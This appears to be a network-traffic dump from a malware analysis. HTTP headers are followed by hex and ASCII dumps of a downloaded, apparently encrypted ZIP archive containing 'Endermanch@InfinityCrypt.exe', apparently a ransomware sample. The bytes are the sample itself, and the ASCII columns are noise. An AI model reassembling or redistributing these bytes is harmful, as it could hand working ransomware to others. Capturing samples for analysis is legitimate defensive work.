                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1664455489.996403,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: ffe5a4eb404b070b7cd395acc772f43c276c91d2
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:49:48 GMT
                                                                                                                                                            Source-Age: 21
                                                                                                                                                            2022-09-29 12:44:49 UTC1118INData Raw: 50 4b 03 04 14 00 01 00 08 00 05 80 55 4d 73 32 bc 1b 3e 85 00 00 00 4c 03 00 1c 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 49 6e 66 69 6e 69 74 79 43 72 79 70 74 2e 65 78 65 82 87 5a 39 90 6f 1d 4b 56 8c 6f a5 78 75 67 df b9 5d 1b e7 c8 de 51 7e 50 59 e3 51 55 6b 55 48 f4 fd 3a ce 54 5a 2e e4 e9 b5 45 cd 28 59 f7 4e ba 07 6e e5 b7 9f ae bb 8e 1b b9 29 ca 82 bd 23 6d 87 ef ce 14 40 b3 aa 88 93 6c cd 38 c9 6b 8f f5 5c 89 57 2c 56 38 77 b2 d9 b4 13 71 55 9c a0 8f ea 4e e3 7c 56 be 4e 74 51 2a e5 23 32 c4 59 6f 50 84 15 53 3b c3 7d 7c 29 80 9c 4e c8 31 f9 27 3f f8 1d 7f 92 10 30 65 9c 61 49 18 4d af bb 52 c4 c6 5a 72 01 0d 3d 7d 39 80 54 2b cd c4 d2 9f b3 f0 40 5d 9b e5 dc ab 59 bb d8 29 21 91 f7 7a 11 f3 62 7b 82 05 97 bb ef f9 6b 35 d2 43 eb 1d 57 43 55 0a
                                                                                                                                                            Data Ascii: PKUMs2>LEndermanch@InfinityCrypt.exeZ9oKVoxug]Q~PYQUkUH:TZ.E(YNn)#m@l8k\W,V8wqUN|VNtQ*#2YoPS;}|)N1'?0eaIMRZr=}9T+@]Y)!zb{k5CWCU
                                                                                                                                                            2022-09-29 12:44:49 UTC1119INData Raw: 31 84 61 77 b6 e3 c9 b2 da 75 c6 fa 65 a5 e9 aa c3 75 e8 3a d7 90 b5 dc 6a 53 45 eb ed 0a b9 1d 24 b2 c1 7e da 22 8a 62 db 0d 02 2b 2f b4 18 81 e8 f4 15 82 a8 a1 41 3a 78 e0 bc a2 3c 90 67 40 1e 1d ff 73 6c ba 96 e0 67 29 52 b9 ad 8d fc ac 7e 00 ef a4 77 2c 98 34 4d 13 52 e1 41 b0 97 2c 53 fd 4c 71 46 9e 56 50 70 47 69 7c ed 5c a5 40 f9 4b e8 93 5e 7a 82 39 df e2 48 d8 e2 76 12 79 b6 92 03 be e3 af bf fc 58 d5 ed 38 bf 0a 7d f1 8b 9b eb c2 95 a7 44 af 7a e1 a2 e0 16 93 90 6e 04 81 f0 74 7f 3d 12 5c b6 40 90 ac fa 1a 85 fc 53 33 0f 75 b1 9b 22 d8 0a 1d c4 03 cd e2 db cb 30 cc d2 98 b6 8e 49 fe b3 f8 08 bc cb 18 60 6d 04 a0 b2 f1 3f 66 77 0f b2 18 86 ea 48 b8 69 da 1c 96 e1 85 7e 6b 92 6f 29 c0 4e 78 ae f2 8b cd 7b 83 02 2a 8b dd 97 64 9e c2 0b c7 ea 92 de
                                                                                                                                                            Data Ascii: 1awueu:jSE$~"b+/A:x<g@slg)R~w,4MRA,SLqFVPpGi|\@K^z9HvyX8}Dznt=\@S3u"0I`m?fwHi~ko)Nx{*d
                                                                                                                                                            2022-09-29 12:44:49 UTC1121INData Raw: 67 ff 25 ef e2 d5 38 39 2a 01 18 c5 98 77 49 c4 f5 60 e4 74 53 1b 7a a3 ae 31 94 71 cf e6 3b a7 df fd af 55 0c c5 2e 29 fe d7 0c 03 b0 4f ba b1 7d eb 34 fc ef 2c 74 15 98 88 eb 79 53 4e e3 e2 01 da 5a a2 24 2f e6 62 c9 1d 4f e7 7e 8a e8 e2 bb aa 3d 4f 40 b2 1c 2b 83 ac 7a f1 cf c6 c6 67 50 80 02 9e d9 04 7e 31 4f 3a 77 16 a3 3c 54 7e 34 cf 67 de dc 30 7e 1c 7f ee 45 d3 87 33 d5 ea cd 9f 13 25 1f 4c 65 4f a7 a0 ab 9e 4a 7c 73 41 49 cb 6c e5 34 10 09 58 bc cf d6 85 a3 ba ad f2 7e 58 1d 28 5b e0 40 e7 7a 10 3a 65 06 2f db 29 b3 8d d7 b2 af 82 b4 8b e8 fe 33 19 85 7c 3c 31 af bb 23 36 05 23 0b 98 0e 10 24 3e a3 a2 7f 3b 5d bc 56 17 39 ff c1 4c e9 98 de a9 ab df e2 a9 8b b3 33 4b 7c 32 29 01 0d 02 1e 20 fb 0a 2e 6e 8c 75 b1 c0 62 cf b9 d3 53 57 3a d6 9b 7d c1
                                                                                                                                                            Data Ascii: g%89*wI`tSz1q;U.)O}4,tySNZ$/bO~=O@+zgP~1O:w<T~4g0~E3%LeOJ|sAIl4X~X([@z:e/)3|<1#6#$>;]V9L3K|2) .nubSW:}
                                                                                                                                                            2022-09-29 12:44:49 UTC1122INData Raw: ec 70 20 ea c0 12 5f e1 f2 c0 af 3d f3 05 8f ef 69 21 e1 cf d1 7c 18 9b d4 f8 03 a2 23 df 57 95 9d 45 f9 e6 e8 f2 95 b9 2b 9a ed a4 b4 5e c8 04 94 00 d8 7c cc 0a 86 42 b4 15 1f df 8a 33 65 b1 7c 84 d9 77 b2 19 9b ca 06 46 97 30 55 4a 43 97 83 47 c9 5e 5c b5 7d af a7 c3 5f d9 ee 2c 4c b0 90 f6 d5 08 8e a3 c0 6f da 0d 7a 2e 02 db 93 57 2f d2 12 3f 45 b8 29 8c 58 fa f6 08 ef 92 03 51 52 7a 9b 73 e4 3c 5b 23 80 59 19 46 9e f5 40 96 e4 09 c8 02 cb 5f 15 f6 13 10 b8 76 85 79 f0 1d 9e ba 47 1f 31 a4 8e 20 a4 98 63 41 57 be 52 e8 74 5e 7a 7f d7 0d 9e b0 a5 f6 06 41 52 81 a8 ce 9c ea 70 f4 1a 20 ed d2 88 01 4d 9a aa c6 c4 69 d9 09 a6 45 ae 37 a2 24 76 19 dd 24 45 f1 c6 3f c1 ca 75 59 73 11 59 e1 56 e4 d0 1c cc 43 65 c4 17 d7 d4 c7 49 48 f8 69 ee 1e 25 4e 96 83 72
                                                                                                                                                            Data Ascii: p _=i!|#WE+^|B3e|wF0UJCG^\}_,Loz.W/?E)XQRzs<[#YF@_vyG1 cAWRt^zARp MiE7$v$E?uYsYVCeIHi%Nr
                                                                                                                                                            2022-09-29 12:44:49 UTC1123INData Raw: 55 fd 69 fe bf 20 83 be 4c a5 aa a7 62 29 fc 69 41 a5 d2 b9 e4 d0 08 3c 2d 1a 3b 02 73 39 88 c1 ae e1 29 95 97 42 09 84 6f 0d 06 11 24 82 ac 12 d3 39 3e 18 59 95 1e 30 ab 33 95 c1 15 65 c2 33 1e 3f 67 69 4b b2 19 db 58 09 42 81 2d 49 2c b7 8d 04 4d 32 c0 81 5e 66 81 f2 5b 1b 1b d4 f4 ed 87 60 9c a2 1d b3 1b 76 9b 42 6b c3 33 e7 b2 77 89 18 37 9b 7e 91 33 44 f6 a3 59 10 ce 66 79 14 ed 58 fb aa 46 45 fb 97 61 ca d6 0b 95 8b 06 b1 d6 3e 21 33 3b 82 28 a4 c1 95 f7 72 97 29 22 bf ed 9e 2a 4a 48 c1 e4 96 54 4a 23 a1 bd f9 39 de a1 8c 0f e2 62 f5 d3 fa 30 9e ba 36 c5 ea 3a a6 b1 5b 6b b4 5e 5a 0e 56 77 e7 e6 40 4f 81 63 f0 7b bb 8e a3 83 49 fe b5 d9 4d 2b 23 71 96 3a 02 4a d4 bc b1 85 a5 be b4 48 ed df 14 d5 c3 09 a9 51 3d f0 0b c8 49 e2 a3 db 81 a0 8e 7f 7c 52
                                                                                                                                                            Data Ascii: Ui Lb)iA<-;s9)Bo$9>Y03e3?giKXB-I,M2^f[`vBk3w7~3DYfyXFEa>!3;(r)"*JHTJ#9b06:[k^ZVw@Oc{IM+#q:JHQ=I|R
                                                                                                                                                            2022-09-29 12:44:49 UTC1125INData Raw: ee 93 ef cd 2b 61 96 54 02 33 f2 11 0b 65 07 c6 fd f2 43 3b 33 e3 4d 54 09 ee 54 d8 03 0e 2e 8e 89 0d 31 73 1a dc c9 d7 ab 7e 8d 8b 13 50 bc fc 49 cd 0d fe 20 5d e9 53 6b 8a e6 03 0a 5e b8 7f 01 aa 40 28 20 88 ce 05 85 8d 7d e9 78 74 f3 c7 c1 44 b9 60 b1 f0 bf 45 49 e9 33 3c 9d ab 65 cf 1e 73 84 9a d1 27 4e 3a 43 bb 46 1b c0 28 8e bb c6 b9 eb e0 e9 23 9a 39 82 f1 f3 1c e1 85 c0 3a e5 97 2e c2 69 af a2 b7 d2 05 09 7b 19 f3 29 46 5c d8 39 58 33 dc f4 dc ca 26 4f 88 93 fc fd 45 2c 01 10 ee a8 ae e6 5a c3 fc 06 19 96 38 0c 48 d1 b6 81 d4 81 0d e0 2b b5 53 98 55 5a e1 5a d9 87 af fb f8 51 98 3a 23 e1 75 70 91 a5 e8 62 27 97 d9 a9 2a 2b 75 62 50 80 4f 03 e7 f7 cf 53 d7 cf 7c f0 50 29 15 f1 44 c3 77 70 9d de af be 5e 2e 42 26 91 26 d6 60 fc 66 1b 3c b3 f7 e7 b1
                                                                                                                                                            Data Ascii: +aT3eC;3MTT.1s~PI ]Sk^@( }xtD`EI3<es'N:CF(#9:.i{)F\9X3&OE,Z8H+SUZZQ:#upb'*+ubPOS|P)Dwp^.B&&`f<
                                                                                                                                                            2022-09-29 12:44:49 UTC1126INData Raw: 30 43 ab 6d ae 09 49 eb 61 71 a1 a4 db 5c af 23 ac d2 7b 6e 50 17 e0 14 8c 35 84 d3 d3 14 cb 0e e3 96 e2 36 fa cf fe 0f 9b e2 e9 30 2f 36 5b 8f f4 26 71 41 b5 00 4f 1c 0d 49 2d a9 b6 10 b0 33 45 22 49 7a 12 27 c1 b2 a9 c8 4c 6c a3 8f 55 49 65 f4 db a4 bb e4 06 d1 5c 20 76 ac 8d 47 d4 61 26 c8 49 98 2f 90 e1 e2 1d 93 30 6f 88 3d 1e 29 73 81 c1 e4 51 1f 73 fa 24 c6 9d e8 be 1b 3a df 04 ce 8d b4 95 d7 5d e4 75 6d 48 b3 23 ad 8f 2a 5e f9 93 d3 4e dd 03 5c 4f 12 fd 3f 44 bf 79 0d 27 50 a0 31 a0 ee bd 5f e0 e8 4b 5d 12 1a a1 f1 88 73 92 89 a3 20 96 5b 9c cb c2 9c 9b ca 04 6a a5 d4 fd a1 58 42 92 95 b1 dd ca d2 bf 54 ad ec 95 8c 89 28 0f 97 78 87 1d c4 c2 d0 48 12 21 7a 38 94 b3 88 7a ec 75 a9 d2 84 be f7 45 74 e3 4b 85 f1 a5 50 4c 9e c5 4c 0b 10 34 2a df 04 76
                                                                                                                                                            Data Ascii: 0CmIaq\#{nP560/6[&qAOI-3E"Iz'LlUIe\ vGa&I/0o=)sQs$:]umH#*^N\O?Dy'P1_K]s [jXBT(xH!z8zuEtKPLL4*v
                                                                                                                                                            2022-09-29 12:44:49 UTC1127INData Raw: 83 73 b0 d0 97 e9 d5 91 20 a8 75 5f 89 ca c0 3c cb cf ab 92 02 48 cc 93 79 f7 7f ef 9d 0d 51 27 36 c9 1e f2 fb 33 34 45 da 34 ee df 72 6f 9d 6c 81 f8 0b 6a 90 64 b0 11 9d 8d a8 e4 5e f2 06 b8 e0 99 d8 ae 1c 53 3b 02 f4 9f 25 08 e5 2e fa 21 f7 55 ca 85 2d db 15 7e f6 63 79 45 25 73 55 34 60 f0 7d b7 be cc 99 24 b2 44 43 4e 7e d8 5a ea f2 07 f0 3f 89 fd e5 41 79 3c 2f 45 96 11 d5 a8 30 2f 48 16 65 e7 f5 0c 2f 27 a2 22 c3 bf 40 1e 20 82 ae d4 d7 26 c5 8e 0f 3e e8 08 d6 96 5a 53 ec 6a 12 25 ba 09 a0 f6 59 40 d6 23 85 b8 67 54 c8 2b 72 32 bc 3f d1 45 16 f8 58 bd 17 45 f7 db df c2 44 3d 9c bd 6d 39 d0 87 29 e5 42 f4 46 09 91 94 91 e2 49 92 1b 80 a2 69 b0 ca 5d d2 3c c6 e3 e0 9e bf 99 e7 4b 70 87 3f 1b a5 bd 8b 2d 51 e6 3c c1 95 e5 0e 7e 71 d7 20 64 4d c6 f9 e8
                                                                                                                                                            Data Ascii: s u_<HyQ'634E4roljd^S;%.!U-~cyE%sU4`}$DCN~Z?Ay</E0/He/'"@ &>ZSj%Y@#gT+r2?EXED=m9)BFIi]<Kp?-Q<~q dM
                                                                                                                                                            2022-09-29 12:44:49 UTC1129INData Raw: db 99 4f 7c b3 82 0a 49 3b b5 da ea 1c a7 f8 15 b3 46 4d 0d 18 0f 55 02 6e d7 57 f2 b8 ff 2e 63 8d 8d ee 59 32 6c fb a4 85 2a 97 e3 54 d7 1f f9 42 0b a3 26 a5 1d 2f b5 b1 90 2e c5 64 61 41 21 04 06 dd c3 6a 07 2e 44 4c 33 89 06 db 94 ba 19 d2 af 6b f5 5a c6 b3 4c 7b e1 46 66 92 45 8a fb cc e6 32 5e f3 88 3b 93 cf 42 a0 bd b2 2d 38 4b 16 3f 05 ff 17 89 25 57 d1 0f 85 92 c8 cf 67 02 ce 83 ab 62 17 7e 00 24 15 4e 7a 45 6b 50 d1 e6 72 01 f0 68 00 14 fb 10 8b 26 d8 d5 5d 2f 7b 2c aa 54 c3 a7 6e cf 57 82 46 9e 44 c8 a6 52 31 0d f6 51 e4 25 1b fc 26 4c ed 91 fe 93 c3 ab d8 fd 87 48 ee a6 e6 fa c1 40 bd c6 a3 5f b9 c3 44 84 99 31 79 3a 50 fe ef 2c 8a 39 e3 be 00 63 02 08 41 07 b0 0f 3f 6b 00 12 07 55 4b 18 c1 46 ad 37 9a aa 72 b9 0f cc a2 6d 7f f7 ae 5b cd 1f 7a
                                                                                                                                                            Data Ascii: O|I;FMUnW.cY2l*TB&/.daA!j.DL3kZL{FfE2^;B-8K?%Wgb~$NzEkPrh&]/{,TnWFDR1Q%&LH@_D1y:P,9cA?kUKF7rm[z
                                                                                                                                                            2022-09-29 12:44:49 UTC1130INData Raw: 2a 3d 20 1c b5 5d cf 26 11 d1 0d 35 1b 93 f3 6e c9 7c 21 ef 65 8b 5e b4 8e e3 af 0c 71 1e f9 75 e7 57 43 f5 c6 6c 79 16 e1 0c b8 7f 3c 93 34 a1 55 be 19 26 2c 21 d9 27 62 7e 87 18 c2 a2 c9 cb 02 9a ab 99 9c b8 ed 23 ef d4 93 0a fd 7f 85 37 4c 4c 3b 8a 1e 48 5b d6 3b 07 a9 fa 21 b6 ff 59 d1 f9 86 2f e3 e7 d5 3b 03 ed 5b ea 21 59 8d f8 c7 ed e3 f5 7e a8 4a 22 b1 e9 5a 52 fb b0 15 f2 49 92 ee 3e 3a 39 59 33 54 80 d1 74 4d 86 e0 d3 13 5e a9 bd 68 93 5f 8f 91 65 5e 69 bd 4e eb 14 b8 37 0d ca 26 02 cf 88 31 cb 07 a8 54 69 b2 5b 4f 9a a0 fd f5 75 a2 fa cb e8 1b b6 11 8c 15 ca 02 7d 9c 3d 6f 99 7d d5 41 61 d7 a6 76 09 08 da 83 05 64 34 a9 b2 4f d7 e4 8f e7 df 99 2e b6 61 cb 63 a3 0f d3 88 d5 44 ef 29 15 49 44 de c3 68 4d db db 5f bd 70 a1 63 d7 f8 b7 57 f8 86 f7
                                                                                                                                                            Data Ascii: *= ]&5n|!e^quWCly<4U&,!'b~#7LL;H[;!Y/;[!Y~J"ZRI>:9Y3TtM^h_e^iN7&1Ti[Ou}=o}Aavd4O.acD)IDhM_pcW
                                                                                                                                                            2022-09-29 12:44:49 UTC1131INData Raw: db a5 a1 d2 dc ed 13 11 30 ca 6e f3 e0 6e 3a 16 87 a6 7b 8d d4 bc 3d f7 e6 d5 0f fa e8 0f dd 1e 82 da 76 42 98 c5 99 ed 46 87 3d ec c2 7a a0 d7 ed f8 35 a7 3c de 27 f6 54 fa 5f 55 c1 28 62 c0 c0 e8 a6 f4 05 5d 4f e1 0e ba 5b af 05 fe f2 ef c2 be 8f 42 76 9f 9b fd b2 32 cc 0f 7e 83 3a 60 c8 7b f6 b2 00 70 05 1b c4 cc b2 4b e9 13 64 c2 62 0d da f1 1b 85 ad 5f bc 77 94 ca bf 51 da e7 0e 69 ae 4c 73 e1 65 98 be 6a 11 b2 ab 1e e7 d8 29 8b 43 8f 94 e8 08 63 91 a2 96 37 62 b9 ab e1 e7 82 59 2d ed d6 90 f3 a9 39 36 ae e7 53 08 f2 23 1b 12 f1 a8 b3 1c 2d 5f 2e ab 05 9e fc ce 70 10 8f c0 c2 95 aa c8 76 0f d2 08 31 29 93 ee 4e fb 4f a2 12 e8 3d b3 82 ed 71 55 93 3f 0e 26 18 d1 69 5d 7a 30 ee a0 8f 07 9d 9e d3 9e 44 3f c2 49 88 87 58 f8 4e 7a fc 3c 02 25 4e 4c 40 63
                                                                                                                                                            Data Ascii: 0nn:{=vBF=z5<'T_U(b]O[Bv2~:`{pKdb_wQiLsej)Cc7bY-96S#-_.pv1)NO=qU?&i]z0D?IXNz<%NL@c
                                                                                                                                                            2022-09-29 12:44:49 UTC1133INData Raw: c2 fd 4b ab b8 f6 1e b3 d2 d6 2a 5c 2e 3e 2c 8a 31 59 2a 4d 1a 11 3b cf 84 48 02 6c 98 09 92 ed e6 1c 1b b5 52 98 89 4b 9e 59 e3 7f ac d7 44 18 70 7c db 52 c8 85 f7 d4 85 21 e7 55 ed 88 17 5c 7d 29 20 86 fc 64 da 87 d9 0c 92 93 2c ee 5f 60 8a 8c f6 72 bf de 22 26 fc f2 e7 4c e3 cb 46 15 3d ae f0 e7 78 3d 5e c0 2e d8 9c 40 54 c7 47 b9 c3 a2 f8 79 d1 98 98 ad b7 e4 b0 b8 28 b2 fe d3 97 f5 db c3 bd 64 b0 f2 d6 95 13 4a 4f 7c 17 ea 8c 3f 55 ff af 14 f0 46 b4 80 de 6e bb d4 3c 08 f5 4a 15 b8 ca 56 17 f5 c7 6a e0 0c 76 5d 1d 4a b4 0c 71 0f 10 2d db 8b d3 bf 36 b4 ef ac 29 cf 3f 45 69 89 30 e5 18 72 d5 8b e5 83 be fc 73 3b e3 15 45 e7 7b 18 8a 65 31 ed b6 53 5a cd c5 3b cd 41 73 99 2d 3d 7f 12 45 2f df 4c 24 d8 4f c8 30 d2 d1 67 27 2a 73 71 33 44 55 99 e2 ae be
                                                                                                                                                            Data Ascii: K*\.>,1Y*M;HlRKYDp|R!U\}) d,_`r"&LF=x=^.@TGy(dJO|?UFn<JVjv]Jq-6)?Ei0rs;E{e1SZ;As-=E/L$O0g'*sq3DU
                                                                                                                                                            2022-09-29 12:44:49 UTC1134INData Raw: 24 92 fe fc 77 e2 29 9c a9 12 46 cd 25 85 c0 aa 9f be dc b3 0c 6d 8e 0d 41 6a 3d 0d 28 a2 fa e4 db 06 3f 63 2b fb ce 1b e5 5d 42 cf 4b 1f f4 85 8a a5 d5 2b 04 fe 2a 55 fc 0e f9 dd 5e 8c e5 e1 d2 fc 7b c5 6a 0b bd 88 04 5c 08 1d ef f4 b5 33 8e 07 4a e9 80 01 0b 42 74 19 2b f3 b0 43 07 a4 d0 a4 99 d6 f8 b9 45 26 6a 6c bd f9 00 89 47 52 53 cc 8e 56 79 5c f0 cf 82 41 c0 6d 17 a0 ff 67 2c 2a 4a 37 b6 e2 31 17 af ae c9 e0 60 4d e5 7f 7b 83 49 66 5c 07 3c 68 f2 c6 83 0f 78 99 0e 39 b7 ef a0 08 6a 10 db 96 43 e6 f5 26 2d b1 f9 9f b0 94 ef 3b d2 05 dc 6b e5 e4 12 82 eb a3 80 2b 50 db 9b 9e 24 32 9f 21 b8 0f b8 cb 2b 2b 9c 2c f0 0c f7 47 c7 39 a9 cb b9 e6 a0 2c 34 03 f9 fe 1e 38 ca ff 27 2f 9c 35 62 74 1c 38 50 39 7e d4 bd f7 19 a9 34 5b d1 9b 93 52 c8 cd ff 16 b2
                                                                                                                                                            Data Ascii: $w)F%mAj=(?c+]BK+*U^{j\3JBt+CE&jlGRSVy\Amg,*J71`M{If\<hx9jC&-;k+P$2!++,G9,48'/5bt8P9~4[R
                                                                                                                                                            2022-09-29 12:44:49 UTC1136INData Raw: 25 88 e4 fb 23 04 4f 1e 93 c9 60 78 0c d6 76 57 92 e6 c1 4f d2 0a 57 c2 17 8e 75 c6 4d e4 23 b3 95 3c f7 b5 07 67 78 75 de 8e b5 3f 98 85 d0 57 6f 4b 80 46 8e 1a 54 60 c8 eb 75 1e e0 8f 99 bb 52 7e 47 9d 88 e4 c5 9d 82 d7 9b 1e 5f 48 32 75 de c9 97 c1 f4 75 5a 80 97 21 67 72 b7 f7 1f 5e fa 9e a4 d7 e2 7f ff 07 cf e9 e6 e2 43 2e f4 10 45 fd f4 ab a0 88 d2 10 8a 49 c3 25 66 f0 82 b7 bd ee 8b 4f 19 f8 1f 46 e2 0b b6 db d0 16 0d 99 cf 35 44 f6 c5 8a 01 44 d1 20 6d 7e 0e 5f 0a ec 1b f0 85 a8 2b 78 36 03 77 54 ed 64 93 f1 af 88 99 c1 fd 26 fc 5f 41 e6 2e 2e 93 ba 43 5e b8 cc 53 85 26 26 79 f7 69 79 fb 24 32 fd 0e 67 8b 65 88 d7 f2 58 dc fa 80 07 84 01 a9 f0 33 e2 10 ba 3f b1 e2 02 d9 8f b5 bf bf 0e 69 3a ef 50 09 af 73 3d 27 b0 3d ff 83 60 f9 5e b0 ad 8f 91 73
                                                                                                                                                            Data Ascii: %#O`xvWOWuM#<gxu?WoKFT`uR~G_H2uuZ!gr^C.EI%fOF5DD m~_+x6wTd&_A..C^S&&yiy$2geX3?i:Ps='=`^s
                                                                                                                                                            2022-09-29 12:44:49 UTC1137INData Raw: 9a 66 0e fd 8f 95 94 b2 46 bc 84 2f df 4e d4 2e d2 7d 0a da a0 12 54 ea 5e 03 30 b8 2a 13 c0 ab 3f 39 ce c2 d7 37 cd d0 66 33 b2 b0 97 57 4b c7 9e f5 06 f9 4b 09 0f 5c d5 c3 97 ee e6 eb 4f 94 ce a0 0f 54 0e 91 8a 5b e7 51 4a 55 c8 94 db e2 83 33 3d b0 01 9d 2c be 0c 02 f1 2b 71 f6 d3 fc 2c ea 51 dc 7c 88 c2 49 c8 05 12 73 e6 11 9e b2 f9 85 6d f2 fb d1 c4 37 a9 4e ea b4 24 e8 38 42 fe d8 bf fc fc 54 95 e7 e1 fd 3a 8f 40 72 93 53 e1 e0 1b 2b 7d da 89 8b 19 a2 e0 b8 13 a1 e0 b5 5d 1d 77 73 40 14 af 8c 8a 27 04 74 00 ad 8c 97 4e 7f 34 5c 88 56 12 9a c8 f5 e8 51 72 04 3a 0e 03 eb f8 f3 8c e5 6d b5 23 93 82 69 cd 4a 88 d8 06 51 cc a9 a2 b1 3a 74 0c a7 fe 36 a6 bf cc 8e f4 ff 7f a6 db 72 7c ca bd e2 ab 73 60 ad a7 12 25 ea bf a4 d7 2d 58 5f 4a 7b a6 4c 5f c5 1d
                                                                                                                                                            Data Ascii: fF/N.}T^0*?97f3WKK\OT[QJU3=,+q,Q|Ism7N$8BT:@rS+}]ws@'tN4\VQr:m#iJQ:t6r|s`%-X_J{L_
                                                                                                                                                            2022-09-29 12:44:49 UTC1138INData Raw: 12 6c e3 a3 b4 64 5d 9a 89 31 de 52 d2 e6 70 e6 c2 a0 10 ad 9b b4 55 1c 0b 42 af 85 02 a6 2b 0e 31 6f 15 d1 2f 99 71 d4 16 40 b9 34 20 31 20 3f 1f 54 7c 61 7e 7a 6a 21 d5 ac 8f c7 37 f3 e0 04 ab e6 f6 db cc ab 70 79 cb 0e 2d e8 c2 73 10 68 ae 88 87 ec 85 eb 7b 91 82 06 56 aa 36 2d d2 72 6e 87 08 c8 a8 bb d1 46 56 89 97 a2 7d ad 0d 24 11 2d 0c 05 ca 17 6d c0 a3 06 64 52 7c 93 52 ff d4 40 77 4f 00 40 ee da b6 d1 48 70 f2 c1 86 4a df e6 d2 0c 51 22 f1 b1 ca ce a8 a5 9a 1c a2 04 c9 0c ea 98 9a e1 01 de ca 21 3c 88 bb 4d e4 51 b2 fe 0a 11 7c e0 48 41 15 d0 f6 c3 8d b8 24 27 86 8d 40 aa d1 28 54 19 e7 26 da 7f a3 65 57 00 1f 3b c6 67 c6 d3 20 9a 7a 93 32 e7 1a 69 a9 5a df 40 72 63 d5 ad 4d 5d 94 f4 53 e4 32 3c b6 97 56 8d 7c da 76 32 dc 47 76 ab ef f7 17 f9 4e
                                                                                                                                                            Data Ascii: ld]1RpUB+1o/q@4 1 ?T|a~zj!7py-sh{V6-rnFV}$-mdR|R@wO@HpJQ"!<MQ|HA$'@(T&eW;g z2iZ@rcM]S2<V|v2GvN
                                                                                                                                                            2022-09-29 12:44:49 UTC1140INData Raw: 67 07 2e e4 72 1c 2e f7 44 d7 94 19 62 36 3b c3 7e 23 ce 89 35 8a 82 10 11 c8 92 e0 27 8b d4 b4 7b 95 15 84 3b 65 d1 63 fd 82 c2 77 b1 c7 0f 22 7a 8a 0f 65 e6 4a 94 2c 29 4b 73 9f de 17 0b 55 c4 02 bb 6d 4a 00 be ec e6 b3 7c c1 68 f2 03 56 c9 bb 2f 40 df 26 c3 8b 2c ca 4f 7d 8c 06 4e bc dd 7a 3a c0 b5 81 ff 43 76 7a 41 f0 32 ff 83 e0 af 9c ab ae 4d 47 0e 12 a7 b1 31 e2 f2 2c 99 95 15 af 81 3d 23 bd 1e 38 7a 40 44 70 10 80 ad 7a 4d 34 79 29 12 75 0c f0 4a ed 00 32 8a fc 84 fb 30 43 7d da e5 0d 19 d1 26 75 9a 32 7d 62 b3 f4 a0 ed f6 34 fc 82 27 7e 30 3a 3f 3b 0d 20 99 2e 85 b8 a4 4b 6d 18 64 3b 11 fc 22 1e 17 ab 7b 8b f2 62 af ba 20 f4 53 d6 a3 c5 1a e4 47 da d4 0c 23 f3 a7 60 d6 ae 06 26 dd 5f 06 bd e4 93 47 ad 73 fe 1e 94 0c 56 9c 30 4a 93 02 b0 c0 e3 22
                                                                                                                                                            Data Ascii: g.r.Db6;~#5'{;ecw"zeJ,)KsUmJ|hV/@&,O}Nz:CvzA2MG1,=#8z@DpzM4y)uJ20C}&u2}b4'~0:?; .Kmd;"{b SG#`&_GsV0J"
                                                                                                                                                            2022-09-29 12:44:49 UTC1141INData Raw: 35 f5 8e 24 0c 44 c7 62 96 b4 1c 9e de 54 4a 32 fd 6f 5d 5d 16 35 27 5a 12 2e 5d a8 6b ad af d0 d1 b9 cc c9 12 09 2e ee b2 94 3d 0c 7d 89 38 a8 56 ca 35 8f 05 de 09 44 66 a2 fc 9f 34 be f5 de 18 fd 8c db 46 06 2a ef 5d 76 6a f8 22 8c 08 0e 68 17 5f 67 11 da 5c 13 16 71 89 b1 a2 ac ef bc 4a 61 9f 74 c7 5f 40 12 8f 5c 8c 76 c4 8f f2 c8 ee fe b1 00 f1 f1 2a 1d c5 31 2f 5e 63 ab 43 73 c0 b7 5c e2 3d 03 9e dc 80 f9 7b ad ec e1 e7 84 9d 65 ff e4 85 2c 59 8d 2b 15 50 46 11 74 27 f0 7a b5 51 73 51 d0 7f 86 7f 3c 7c a7 bd ea af bf 73 31 53 07 e2 4e c9 19 69 52 33 80 1c 58 5f a2 9b 8a 7e 6f 5e dc 68 e6 5a 46 c8 d8 0a 8d 5b c4 95 53 ba 44 af 23 ec 4a 8b 82 d8 a2 29 cc aa 84 94 bd b9 97 29 0d f0 96 25 47 35 da 24 4c f4 9e 1a 24 14 9f 6e f7 35 15 0a d2 09 00 21 39 aa
                                                                                                                                                            Data Ascii: 5$DbTJ2o]]5'Z.]k.=}8V5Df4F*]vj"h_g\qJat_@\v*1/^cCs\={e,Y+PFt'zQsQ<|s1SNiR3X_~o^hZF[SD#J))%G5$L$n5!9
                                                                                                                                                            2022-09-29 12:44:49 UTC1142INData Raw: fc d0 c7 e3 c0 a9 87 b5 19 b7 18 b8 19 75 4f b9 f3 31 01 54 03 66 c6 d3 c9 aa 58 14 fb 32 67 4c 72 34 dc 6a 52 31 73 30 6a a9 b3 5a 23 90 b7 7e 34 9d 1e dd a2 67 57 d5 46 4a 16 64 e0 58 76 e9 29 8b 09 f3 b1 a6 66 5d 0c b8 30 1c 92 6e 12 b4 62 7b 5e 48 30 fc e5 00 ee 57 a3 f5 9e 2f 85 0b 3e f8 d9 02 4e ce 8b 5a e4 12 48 13 12 9a c1 c1 cd 97 25 3f 1b 05 d1 00 79 5a ee c7 e1 93 a4 13 bf 00 2a 63 aa aa 6c 96 e0 e1 c0 4c df f8 70 94 de 0b ab 24 05 2a 28 5b 7d 8a 5b 88 1d 07 69 0f f6 83 bc bf 4b 64 f9 dd 41 fa d7 30 27 d1 b6 a4 ea aa 97 ff 15 29 81 e4 05 18 d0 d0 13 a5 c6 80 5e 27 ca dd f3 c9 17 ed f1 83 9d 2b 50 b5 33 6c 67 07 2a 5f 34 8f fa 97 43 fc ad 14 3c 3e f7 26 40 bb 02 24 bf e9 37 87 63 b6 2c da 76 d0 a8 2a 8b 69 00 b2 96 c2 51 1a 63 35 78 2b 76 d8 97
                                                                                                                                                            Data Ascii: uO1TfX2gLr4jR1s0jZ#~4gWFJdXv)f]0nb{^H0W/>NZH%?yZ*clLp$*([}[iKdA0')^'+P3lg*_4C<>&@$7c,v*iQc5x+v
